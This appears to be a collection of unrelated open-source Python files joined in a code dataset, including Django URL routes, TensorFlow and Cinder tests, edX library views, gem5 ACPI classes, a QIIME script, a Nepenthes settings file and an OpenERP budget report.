url(r'^$',
'users.views.contact',
name="home"),
url(r'^about/$',
TemplateView.as_view(template_name='pages/about.html'),
name="about"),
url(r'^personal/$',
TemplateView.as_view(template_name='pages/personal.html'),
name="personal"),
url(r'^business/$',
TemplateView.as_view(template_name='pages/business.html'),
name="business"),
url(r'^professionals/$',
TemplateView.as_view(template_name='pages/professionals.html'),
name="professionals"),
url(r'^clients/$',
TemplateView.as_view(template_name='pages/clients.html'),
name="clients"),
# Uncomment the next line to enable the admin:
url(r'^admin/', include(admin.site.urls)),
# User management
url(r'^users/', include("users.urls", namespace="users")),
url(r'^accounts/', include('allauth.urls')),
# Uncomment the next line to enable avatars
url(r'^avatar/', include('avatar.urls')),
# Your stuff: custom urls go here
url(r'^pages/', include("nupages.urls", namespace="nupages")),
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
bsd-3-clause
|
vrv/tensorflow
|
tensorflow/python/kernel_tests/conv2d_backprop_filter_grad_test.py
|
101
|
2774
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for convolution related functionality in tensorflow.ops.nn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class Conv2DBackpropFilterGradTest(test.TestCase):
def testGradient(self):
with self.test_session():
for padding in ["SAME", "VALID"]:
for stride in [1, 2]:
np.random.seed(1)
in_shape = [5, 8, 6, 4]
in_val = constant_op.constant(
2 * np.random.random_sample(in_shape) - 1, dtype=dtypes.float32)
filter_shape = [3, 3, 4, 6]
# Make a convolution op with the current settings, just to easily get
# the shape of the output.
conv_out = nn_ops.conv2d(in_val,
array_ops.zeros(filter_shape),
[1, stride, stride, 1], padding)
out_backprop_shape = conv_out.get_shape().as_list()
out_backprop_val = constant_op.constant(
2 * np.random.random_sample(out_backprop_shape) - 1,
dtype=dtypes.float32)
output = nn_ops.conv2d_backprop_filter(in_val, filter_shape,
out_backprop_val,
[1, stride, stride, 1],
padding)
err = gradient_checker.compute_gradient_error(
[in_val, out_backprop_val], [in_shape, out_backprop_shape],
output, filter_shape)
print("conv2d_backprop_filter gradient err = %g " % err)
err_tolerance = 2e-3
self.assertLess(err, err_tolerance)
if __name__ == "__main__":
test.main()
|
apache-2.0
|
MakeHer/edx-platform
|
cms/djangoapps/contentstore/views/library.py
|
36
|
9259
|
"""
Views related to content libraries.
A content library is a structure containing XBlocks which can be re-used in the
multiple courses.
"""
from __future__ import absolute_import
import json
import logging
from contentstore.views.item import create_xblock_info
from contentstore.utils import reverse_library_url, add_instructor
from django.http import HttpResponseNotAllowed, Http404
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.conf import settings
from django.utils.translation import ugettext as _
from django.views.decorators.http import require_http_methods
from django.views.decorators.csrf import ensure_csrf_cookie
from edxmako.shortcuts import render_to_response
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import LibraryLocator, LibraryUsageLocator
from xmodule.modulestore.exceptions import DuplicateCourseError
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from .user import user_with_role
from .component import get_component_templates, CONTAINER_TEMPLATES
from student.auth import (
STUDIO_VIEW_USERS, STUDIO_EDIT_ROLES, get_user_permissions, has_studio_read_access, has_studio_write_access
)
from student.roles import CourseInstructorRole, CourseStaffRole, LibraryUserRole
from util.json_request import expect_json, JsonResponse, JsonResponseBadRequest
__all__ = ['library_handler', 'manage_library_users']
log = logging.getLogger(__name__)
LIBRARIES_ENABLED = settings.FEATURES.get('ENABLE_CONTENT_LIBRARIES', False)
@login_required
@ensure_csrf_cookie
@require_http_methods(('GET', 'POST'))
def library_handler(request, library_key_string=None):
"""
RESTful interface to most content library related functionality.
"""
if not LIBRARIES_ENABLED:
log.exception("Attempted to use the content library API when the libraries feature is disabled.")
raise Http404 # Should never happen because we test the feature in urls.py also
if library_key_string is not None and request.method == 'POST':
return HttpResponseNotAllowed(("POST",))
if request.method == 'POST':
return _create_library(request)
# request method is get, since only GET and POST are allowed by @require_http_methods(('GET', 'POST'))
if library_key_string:
return _display_library(library_key_string, request)
return _list_libraries(request)
def _display_library(library_key_string, request):
"""
Displays single library
"""
library_key = CourseKey.from_string(library_key_string)
if not isinstance(library_key, LibraryLocator):
log.exception("Non-library key passed to content libraries API.") # Should never happen due to url regex
raise Http404 # This is not a library
if not has_studio_read_access(request.user, library_key):
log.exception(
u"User %s tried to access library %s without permission",
request.user.username, unicode(library_key)
)
raise PermissionDenied()
library = modulestore().get_library(library_key)
if library is None:
log.exception(u"Library %s not found", unicode(library_key))
raise Http404
response_format = 'html'
if (
request.REQUEST.get('format', 'html') == 'json' or
'application/json' in request.META.get('HTTP_ACCEPT', 'text/html')
):
response_format = 'json'
return library_blocks_view(library, request.user, response_format)
def _list_libraries(request):
"""
List all accessible libraries
"""
lib_info = [
{
"display_name": lib.display_name,
"library_key": unicode(lib.location.library_key),
}
for lib in modulestore().get_libraries()
if has_studio_read_access(request.user, lib.location.library_key)
]
return JsonResponse(lib_info)
@expect_json
def _create_library(request):
"""
Helper method for creating a new library.
"""
display_name = None
try:
display_name = request.json['display_name']
org = request.json['org']
library = request.json.get('number', None)
if library is None:
library = request.json['library']
store = modulestore()
with store.default_store(ModuleStoreEnum.Type.split):
new_lib = store.create_library(
org=org,
library=library,
user_id=request.user.id,
fields={"display_name": display_name},
)
# Give the user admin ("Instructor") role for this library:
add_instructor(new_lib.location.library_key, request.user, request.user)
except KeyError as error:
log.exception("Unable to create library - missing required JSON key.")
return JsonResponseBadRequest({
"ErrMsg": _("Unable to create library - missing required field '{field}'").format(field=error.message)
})
except InvalidKeyError as error:
log.exception("Unable to create library - invalid key.")
return JsonResponseBadRequest({
"ErrMsg": _("Unable to create library '{name}'.\n\n{err}").format(name=display_name, err=error.message)
})
except DuplicateCourseError:
log.exception("Unable to create library - one already exists with the same key.")
return JsonResponseBadRequest({
'ErrMsg': _(
'There is already a library defined with the same '
'organization and library code. Please '
'change your library code so that it is unique within your organization.'
)
})
lib_key_str = unicode(new_lib.location.library_key)
return JsonResponse({
'url': reverse_library_url('library_handler', lib_key_str),
'library_key': lib_key_str,
})
def library_blocks_view(library, user, response_format):
"""
The main view of a course's content library.
Shows all the XBlocks in the library, and allows adding/editing/deleting
them.
Can be called with response_format="json" to get a JSON-formatted list of
the XBlocks in the library along with library metadata.
Assumes that read permissions have been checked before calling this.
"""
assert isinstance(library.location.library_key, LibraryLocator)
assert isinstance(library.location, LibraryUsageLocator)
children = library.children
if response_format == "json":
# The JSON response for this request is short and sweet:
prev_version = library.runtime.course_entry.structure['previous_version']
return JsonResponse({
"display_name": library.display_name,
"library_id": unicode(library.location.library_key),
"version": unicode(library.runtime.course_entry.course_key.version),
"previous_version": unicode(prev_version) if prev_version else None,
"blocks": [unicode(x) for x in children],
})
can_edit = has_studio_write_access(user, library.location.library_key)
xblock_info = create_xblock_info(library, include_ancestor_info=False, graders=[])
component_templates = get_component_templates(library, library=True) if can_edit else []
return render_to_response('library.html', {
'can_edit': can_edit,
'context_library': library,
'component_templates': component_templates,
'xblock_info': xblock_info,
'templates': CONTAINER_TEMPLATES,
})
def manage_library_users(request, library_key_string):
"""
Studio UI for editing the users within a library.
Uses the /course_team/:library_key/:user_email/ REST API to make changes.
"""
library_key = CourseKey.from_string(library_key_string)
if not isinstance(library_key, LibraryLocator):
raise Http404 # This is not a library
user_perms = get_user_permissions(request.user, library_key)
if not user_perms & STUDIO_VIEW_USERS:
raise PermissionDenied()
library = modulestore().get_library(library_key)
if library is None:
raise Http404
# Segment all the users explicitly associated with this library, ensuring each user only has one role listed:
instructors = set(CourseInstructorRole(library_key).users_with_role())
staff = set(CourseStaffRole(library_key).users_with_role()) - instructors
users = set(LibraryUserRole(library_key).users_with_role()) - instructors - staff
formatted_users = []
for user in instructors:
formatted_users.append(user_with_role(user, 'instructor'))
for user in staff:
formatted_users.append(user_with_role(user, 'staff'))
for user in users:
formatted_users.append(user_with_role(user, 'library_user'))
return render_to_response('manage_users_lib.html', {
'context_library': library,
'users': formatted_users,
'allow_actions': bool(user_perms & STUDIO_EDIT_ROLES),
'library_key': unicode(library_key),
'lib_users_url': reverse_library_url('manage_library_users', library_key_string),
'show_children_previews': library.show_children_previews
})
|
agpl-3.0
|
koparasy/gemfi
|
src/arch/x86/bios/ACPI.py
|
73
|
3853
|
# Copyright (c) 2008 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from m5.params import *
from m5.SimObject import SimObject
# ACPI description table header. Subclasses contain and handle the actual
# contents as appropriate for that type of table.
class X86ACPISysDescTable(SimObject):
type = 'X86ACPISysDescTable'
cxx_class = 'X86ISA::ACPI::SysDescTable'
cxx_header = 'arch/x86/bios/acpi.hh'
abstract = True
oem_id = Param.String('', 'string identifying the oem')
oem_table_id = Param.String('', 'oem table ID')
oem_revision = Param.UInt32(0, 'oem revision number for the table')
creator_id = Param.String('',
'string identifying the generator of the table')
creator_revision = Param.UInt32(0,
'revision number for the creator of the table')
class X86ACPIRSDT(X86ACPISysDescTable):
type = 'X86ACPIRSDT'
cxx_class = 'X86ISA::ACPI::RSDT'
cxx_header = 'arch/x86/bios/acpi.hh'
entries = VectorParam.X86ACPISysDescTable([], 'system description tables')
class X86ACPIXSDT(X86ACPISysDescTable):
type = 'X86ACPIXSDT'
cxx_class = 'X86ISA::ACPI::XSDT'
cxx_header = 'arch/x86/bios/acpi.hh'
entries = VectorParam.X86ACPISysDescTable([], 'system description tables')
# Root System Description Pointer Structure
class X86ACPIRSDP(SimObject):
type = 'X86ACPIRSDP'
cxx_class = 'X86ISA::ACPI::RSDP'
cxx_header = 'arch/x86/bios/acpi.hh'
oem_id = Param.String('', 'string identifying the oem')
# Because 0 encodes ACPI 1.0, 2 encodes ACPI 3.0, the version implemented
# here.
revision = Param.UInt8(2, 'revision of ACPI being used, zero indexed')
rsdt = Param.X86ACPIRSDT(NULL, 'root system description table')
xsdt = Param.X86ACPIXSDT(X86ACPIXSDT(),
'extended system description table')
|
bsd-3-clause
|
biocore/qiime
|
scripts/parallel_pick_otus_blast.py
|
15
|
4460
|
#!/usr/bin/env python
# File created on 09 Feb 2010
from __future__ import division
__author__ = "Greg Caporaso"
__copyright__ = "Copyright 2011, The QIIME Project"
__credits__ = ["Greg Caporaso", "Dan Knights", "Jose Antonio Navas Molina"]
__license__ = "GPL"
__version__ = "1.9.1-dev"
__maintainer__ = "Greg Caporaso"
__email__ = "gregcaporaso@gmail.com"
from qiime.util import (parse_command_line_parameters,
get_options_lookup,
make_option)
from qiime.parallel.pick_otus import ParallelPickOtusBlast
options_lookup = get_options_lookup()
script_info = {}
script_info['brief_description'] = """Parallel pick otus using BLAST"""
script_info[
'script_description'] = """This script performs like the pick_otus.py script, but is intended to make use of multicore/multiprocessor environments to perform analyses in parallel."""
script_info['script_usage'] = []
script_info['script_usage'].append(
("""Example""",
"""Pick OTUs by blasting $PWD/inseqs.fasta against $PWD/refseqs.fasta and write the output to the $PWD/blast_otus/ directory. ALWAYS SPECIFY ABSOLUTE FILE PATHS (absolute path represented here as $PWD, but will generally look something like /home/ubuntu/my_analysis/).""",
"""%prog -i $PWD/seqs.fna -r $PWD/refseqs.fna -o $PWD/blast_otus/"""))
script_info[
'output_description'] = """The output consists of two files (i.e. seqs_otus.txt and seqs_otus.log). The .txt file is composed of tab-delimited lines, where the first field on each line corresponds to an (arbitrary) cluster identifier, and the remaining fields correspond to sequence identifiers assigned to that cluster. Sequence identifiers correspond to those provided in the input FASTA file. The resulting .log file contains a list of parameters passed to this script along with the output location of the resulting .txt file."""
script_info['required_options'] = [
make_option('-i', '--input_fasta_fp', action='store',
type='existing_filepath', help='full path to ' +
'input_fasta_fp'),
make_option('-o', '--output_dir', action='store',
type='new_dirpath', help='path to store output files')
]
script_info['optional_options'] = [
make_option('-e', '--max_e_value',
help='Max E-value ' +
'[default: %default]', default='1e-10'),
make_option('-s', '--similarity', action='store',
type='float', help='Sequence similarity ' +
'threshold [default: %default]', default=0.97),
make_option('-r', '--refseqs_fp', action='store',
type='existing_filepath', help='full path to ' +
'template alignment [default: %default]'),
make_option('-b', '--blast_db', action='store',
type='blast_db', help='database to blast against ' +
'[default: %default]'),
make_option('--min_aligned_percent',
help=('Minimum percent of query sequence that can be aligned '
'to consider a hit, expressed as a fraction between 0 '
'and 1 (BLAST OTU picker only) [default: %default]'),
default=0.50, type='float'),
options_lookup['jobs_to_start'],
options_lookup['retain_temp_files'],
options_lookup['suppress_submit_jobs'],
options_lookup['poll_directly'],
options_lookup['cluster_jobs_fp'],
options_lookup['suppress_polling'],
options_lookup['job_prefix'],
options_lookup['seconds_to_sleep']
]
script_info['version'] = __version__
def main():
option_parser, opts, args = parse_command_line_parameters(**script_info)
if opts.blast_db is None and opts.refseqs_fp is None:
option_parser.error('Either blast_db or refseqs_fp must be provided.')
# create dict of command-line options
params = eval(str(opts))
parallel_runner = ParallelPickOtusBlast(
cluster_jobs_fp=opts.cluster_jobs_fp,
jobs_to_start=opts.jobs_to_start,
retain_temp_files=opts.retain_temp_files,
suppress_polling=opts.suppress_polling,
seconds_to_sleep=opts.seconds_to_sleep)
parallel_runner(opts.input_fasta_fp,
opts.output_dir,
params,
job_prefix=opts.job_prefix,
poll_directly=opts.poll_directly,
suppress_submit_jobs=opts.suppress_submit_jobs)
if __name__ == "__main__":
main()
|
gpl-2.0
|
Netuitive/Diamond
|
src/collectors/ntpd/test/testntpd.py
|
31
|
2751
|
#!/usr/bin/python
# coding=utf-8
##########################################################################
from test import CollectorTestCase
from test import get_collector_config
from test import unittest
from mock import Mock
from mock import patch
from diamond.collector import Collector
from ntpd import NtpdCollector
##########################################################################
class TestNtpdCollector(CollectorTestCase):
def setUp(self):
config = get_collector_config('NtpdCollector', {})
self.collector = NtpdCollector(config, None)
def test_import(self):
self.assertTrue(NtpdCollector)
@patch.object(Collector, 'publish')
def test_should_work_wtih_real_data(self, publish_mock):
ntpq_data = Mock(
return_value=self.getFixture('ntpq').getvalue())
ntpdc_kerninfo_data = Mock(
return_value=self.getFixture('ntpdc_kerninfo').getvalue())
ntpdc_sysinfo_data = Mock(
return_value=self.getFixture('ntpdc_sysinfo').getvalue())
collector_mock = patch.multiple(
NtpdCollector,
get_ntpq_output=ntpq_data,
get_ntpdc_kerninfo_output=ntpdc_kerninfo_data,
get_ntpdc_sysinfo_output=ntpdc_sysinfo_data)
collector_mock.start()
self.collector.collect()
collector_mock.stop()
metrics = {
'jitter': 0.026,
'when': 39,
'stratum': 2,
'reach': 377,
'delay': 0.127,
'poll': 1024,
'max_error': 0.039793,
'est_error': 5.1e-05,
'frequency': -14.24,
'offset': -5.427e-06,
'root_distance': 0.07663,
'root_dispersion': 0.09311
}
self.setDocExample(collector=self.collector.__class__.__name__,
metrics=metrics,
defaultpath=self.collector.config['path'])
self.assertPublishedMany(publish_mock, metrics)
@patch.object(Collector, 'publish')
def test_should_fail_gracefully(self, publish_mock):
ntpq_data = Mock(return_value='')
ntpdc_kerninfo_data = Mock(return_value='')
ntpdc_sysinfo_data = Mock(return_value='')
collector_mock = patch.multiple(
NtpdCollector,
get_ntpq_output=ntpq_data,
get_ntpdc_kerninfo_output=ntpdc_kerninfo_data,
get_ntpdc_sysinfo_output=ntpdc_sysinfo_data)
collector_mock.start()
self.collector.collect()
collector_mock.stop()
self.assertPublishedMany(publish_mock, {})
##########################################################################
if __name__ == "__main__":
unittest.main()
|
mit
|
ge0rgi/cinder
|
cinder/tests/unit/objects/test_cluster.py
|
1
|
6662
|
# Copyright (c) 2016 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import ddt
import mock
from oslo_utils import timeutils
from cinder import objects
from cinder.tests.unit import fake_cluster
from cinder.tests.unit import objects as test_objects
from cinder import utils
def _get_filters_sentinel():
return {'session': mock.sentinel.session,
'name_match_level': mock.sentinel.name_match_level,
'read_deleted': mock.sentinel.read_deleted,
'get_services': mock.sentinel.get_services,
'services_summary': mock.sentinel.services_summary,
'name': mock.sentinel.name,
'binary': mock.sentinel.binary,
'is_up': mock.sentinel.is_up,
'disabled': mock.sentinel.disabled,
'disabled_reason': mock.sentinel.disabled_reason,
'race_preventer': mock.sentinel.race_preventer,
'last_heartbeat': mock.sentinel.last_heartbeat,
'num_hosts': mock.sentinel.num_hosts,
'name_match_level': mock.sentinel.name_match_level,
'num_down_hosts': mock.sentinel.num_down_hosts}
@ddt.ddt
class TestCluster(test_objects.BaseObjectsTestCase):
"""Test Cluster Versioned Object methods."""
cluster = fake_cluster.fake_cluster_orm()
@mock.patch('cinder.db.sqlalchemy.api.cluster_get', return_value=cluster)
def test_get_by_id(self, cluster_get_mock):
filters = _get_filters_sentinel()
cluster = objects.Cluster.get_by_id(self.context,
mock.sentinel.cluster_id,
**filters)
self.assertIsInstance(cluster, objects.Cluster)
self._compare(self, self.cluster, cluster)
cluster_get_mock.assert_called_once_with(self.context,
mock.sentinel.cluster_id,
**filters)
@mock.patch('cinder.db.sqlalchemy.api.cluster_create',
return_value=cluster)
def test_create(self, cluster_create_mock):
cluster = objects.Cluster(context=self.context, name='cluster_name')
cluster.create()
self.assertEqual(self.cluster.id, cluster.id)
cluster_create_mock.assert_called_once_with(self.context,
{'name': 'cluster_name'})
@mock.patch('cinder.db.sqlalchemy.api.cluster_update',
return_value=cluster)
def test_save(self, cluster_update_mock):
cluster = fake_cluster.fake_cluster_ovo(self.context)
cluster.disabled = True
cluster.save()
cluster_update_mock.assert_called_once_with(self.context, cluster.id,
{'disabled': True})
@mock.patch('cinder.db.sqlalchemy.api.cluster_destroy')
def test_destroy(self, cluster_destroy_mock):
cluster = fake_cluster.fake_cluster_ovo(self.context)
cluster.destroy()
cluster_destroy_mock.assert_called_once_with(mock.ANY, cluster.id)
@mock.patch('cinder.db.sqlalchemy.api.cluster_get', return_value=cluster)
def test_refresh(self, cluster_get_mock):
cluster = fake_cluster.fake_cluster_ovo(self.context)
cluster.refresh()
cluster_get_mock.assert_called_once_with(self.context, cluster.id)
def test_is_up_no_last_hearbeat(self):
cluster = fake_cluster.fake_cluster_ovo(self.context,
last_heartbeat=None)
self.assertFalse(cluster.is_up)
def test_is_up(self):
cluster = fake_cluster.fake_cluster_ovo(
self.context,
last_heartbeat=timeutils.utcnow(with_timezone=True))
self.assertTrue(cluster.is_up)
def test_is_up_limit(self):
limit_expired = (utils.service_expired_time(True) +
timeutils.datetime.timedelta(seconds=1))
cluster = fake_cluster.fake_cluster_ovo(self.context,
last_heartbeat=limit_expired)
self.assertTrue(cluster.is_up)
def test_is_up_down(self):
expired_time = (utils.service_expired_time(True) -
timeutils.datetime.timedelta(seconds=1))
cluster = fake_cluster.fake_cluster_ovo(self.context,
last_heartbeat=expired_time)
self.assertFalse(cluster.is_up)
@ddt.data('1.0', '1.1')
def tests_obj_make_compatible(self, version):
new_fields = {'replication_status': 'error', 'frozen': True,
'active_backend_id': 'replication'}
cluster = objects.Cluster(self.context, **new_fields)
primitive = cluster.obj_to_primitive(version)
converted_cluster = objects.Cluster.obj_from_primitive(primitive)
for key, value in new_fields.items():
if version == '1.0':
self.assertFalse(converted_cluster.obj_attr_is_set(key))
else:
self.assertEqual(value, getattr(converted_cluster, key))
class TestClusterList(test_objects.BaseObjectsTestCase):
"""Test ClusterList Versioned Object methods."""
@mock.patch('cinder.db.sqlalchemy.api.cluster_get_all')
def test_cluster_get_all(self, cluster_get_all_mock):
orm_values = [
fake_cluster.fake_cluster_orm(),
fake_cluster.fake_cluster_orm(id=2, name='cluster_name2'),
]
cluster_get_all_mock.return_value = orm_values
filters = _get_filters_sentinel()
result = objects.ClusterList.get_all(self.context, **filters)
cluster_get_all_mock.assert_called_once_with(
self.context, filters.pop('is_up'), filters.pop('get_services'),
filters.pop('services_summary'), filters.pop('read_deleted'),
filters.pop('name_match_level'), **filters)
self.assertEqual(2, len(result))
for i in range(len(result)):
self.assertIsInstance(result[i], objects.Cluster)
self._compare(self, orm_values[i], result[i])
|
apache-2.0
|
qbeenslee/Nepenthes-Server
|
config/setting.py
|
1
|
1657
|
# coding:utf-8
'''
设置
Author : qbeenslee
Created : 2014/10/9
'''
import os
# 是否开启测试
DEBUG = False
BASE_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir))
# 数据库设置
# if DEBUG:
# DB_CONFIG = {
# "host": '127.0.0.1',
# "db": 'nepenthes',
# "port": '3140',
# "user": 'test',
# "password": 'abcd',
# }
# else:
# import sae.const
#
# DB_CONFIG = {
# "host": sae.const.MYSQL_HOST,
# "db": sae.const.MYSQL_DB,
# "port": sae.const.MYSQL_PORT,
# "user": sae.const.MYSQL_USER,
# "password": sae.const.MYSQL_PASS,
# }
DB_CONFIG = {
"host": '127.0.0.1',
"db": 'nepenthes',
"port": '3306',
"user": 'test',
"password": 'abcdef',
}
# 数据库连接
DB_CONNECT_STRING = 'mysql://' + DB_CONFIG['user'] + ':' + DB_CONFIG['password'] + '@' + DB_CONFIG['host'] + ':' + \
DB_CONFIG['port'] + '/' + DB_CONFIG['db'] + '?charset=utf8'
settings = {
'cookie_secret': 'WJyZi+hkyLTMS0X3yVHn6SzaFrY0jscNRCN6aXBIUaTCZhC',
'debug': DEBUG,
'static_path': os.path.join(BASE_PATH, 'static'),
}
# 密码重试次数
PWD_ERROR_TIME = 10
# 密码有效时长(单位:s 时长:7天)
PWD_HOLD_TIME_DEFAULT = 604800.0
PWD_HOLD_TIME_SHORT = 36000.0
# 密码迭代次数区间
PWD_ITERATION_INTERVAL = {'MIN': 11, 'MAX': 99}
# 发信邮箱账号
OFFICE_EMAIL_COUNT = r'****'
OFFICE_EMAIL_SMTPSERVER = r'****'
OFFICE_EMAIL_NAME_TITLE = r'****'
OFFICE_EMAIL_PASSWORD = r'****'
UPLOAD_PATH = os.path.join(BASE_PATH, 'static/upload/')
if __name__ == '__main__':
print BASE_PATH
print UPLOAD_PATH
|
gpl-3.0
|
legalsylvain/OpenUpgrade
|
addons/account_budget/report/crossovered_budget_report.py
|
63
|
8603
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.report import report_sxw
class budget_report(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(budget_report, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'funct': self.funct,
'funct_total': self.funct_total,
'time': time,
})
self.context = context
def funct(self, object, form, ids=None, done=None, level=1):
if ids is None:
ids = {}
if not ids:
ids = self.ids
if not done:
done = {}
global tot
tot = {
'theo':0.00,
'pln':0.00,
'prac':0.00,
'perc':0.00
}
result = []
budgets = self.pool.get('crossovered.budget').browse(self.cr, self.uid, [object.id], self.context.copy())
c_b_lines_obj = self.pool.get('crossovered.budget.lines')
acc_analytic_obj = self.pool.get('account.analytic.account')
for budget_id in budgets:
res = {}
budget_lines = []
budget_ids = []
d_from = form['date_from']
d_to = form['date_to']
for line in budget_id.crossovered_budget_line:
budget_ids.append(line.id)
if not budget_ids:
return []
self.cr.execute('SELECT DISTINCT(analytic_account_id) FROM crossovered_budget_lines WHERE id = ANY(%s)',(budget_ids,))
an_ids = self.cr.fetchall()
context = {'wizard_date_from': d_from, 'wizard_date_to': d_to}
for i in range(0, len(an_ids)):
if not an_ids[i][0]:
continue
analytic_name = acc_analytic_obj.browse(self.cr, self.uid, [an_ids[i][0]])
res={
'b_id': '-1',
'a_id': '-1',
'name': analytic_name[0].name,
'status': 1,
'theo': 0.00,
'pln': 0.00,
'prac': 0.00,
'perc': 0.00
}
result.append(res)
line_ids = c_b_lines_obj.search(self.cr, self.uid, [('id', 'in', budget_ids), ('analytic_account_id','=',an_ids[i][0])])
line_id = c_b_lines_obj.browse(self.cr, self.uid, line_ids)
tot_theo = tot_pln = tot_prac = tot_perc = 0.00
done_budget = []
for line in line_id:
if line.id in budget_ids:
theo = pract = 0.00
theo = c_b_lines_obj._theo_amt(self.cr, self.uid, [line.id], context)[line.id]
pract = c_b_lines_obj._prac_amt(self.cr, self.uid, [line.id], context)[line.id]
if line.general_budget_id.id in done_budget:
for record in result:
if record['b_id'] == line.general_budget_id.id and record['a_id'] == line.analytic_account_id.id:
record['theo'] += theo
record['pln'] += line.planned_amount
record['prac'] += pract
if record['theo'] <> 0.00:
perc = (record['prac'] / record['theo']) * 100
else:
perc = 0.00
record['perc'] = perc
tot_theo += theo
tot_pln += line.planned_amount
tot_prac += pract
tot_perc += perc
else:
if theo <> 0.00:
perc = (pract / theo) * 100
else:
perc = 0.00
res1 = {
'a_id': line.analytic_account_id.id,
'b_id': line.general_budget_id.id,
'name': line.general_budget_id.name,
'status': 2,
'theo': theo,
'pln': line.planned_amount,
'prac': pract,
'perc': perc,
}
tot_theo += theo
tot_pln += line.planned_amount
tot_prac += pract
tot_perc += perc
if form['report'] == 'analytic-full':
result.append(res1)
done_budget.append(line.general_budget_id.id)
else:
if line.general_budget_id.id in done_budget:
continue
else:
res1={
'a_id': line.analytic_account_id.id,
'b_id': line.general_budget_id.id,
'name': line.general_budget_id.name,
'status': 2,
'theo': 0.00,
'pln': 0.00,
'prac': 0.00,
'perc': 0.00
}
if form['report'] == 'analytic-full':
result.append(res1)
done_budget.append(line.general_budget_id.id)
if tot_theo == 0.00:
tot_perc = 0.00
else:
tot_perc = float(tot_prac / tot_theo) * 100
if form['report'] == 'analytic-full':
result[-(len(done_budget) +1)]['theo'] = tot_theo
tot['theo'] += tot_theo
result[-(len(done_budget) +1)]['pln'] = tot_pln
tot['pln'] += tot_pln
result[-(len(done_budget) +1)]['prac'] = tot_prac
tot['prac'] += tot_prac
result[-(len(done_budget) +1)]['perc'] = tot_perc
else:
result[-1]['theo'] = tot_theo
tot['theo'] += tot_theo
result[-1]['pln'] = tot_pln
tot['pln'] += tot_pln
result[-1]['prac'] = tot_prac
tot['prac'] += tot_prac
result[-1]['perc'] = tot_perc
if tot['theo'] == 0.00:
tot['perc'] = 0.00
else:
tot['perc'] = float(tot['prac'] / tot['theo']) * 100
return result
def funct_total(self, form):
result = []
res = {}
res = {
'tot_theo': tot['theo'],
'tot_pln': tot['pln'],
'tot_prac': tot['prac'],
'tot_perc': tot['perc']
}
result.append(res)
return result
class report_crossoveredbudget(osv.AbstractModel):
_name = 'report.account_budget.report_crossoveredbudget'
_inherit = 'report.abstract_report'
_template = 'account_budget.report_crossoveredbudget'
_wrapped_report_class = budget_report
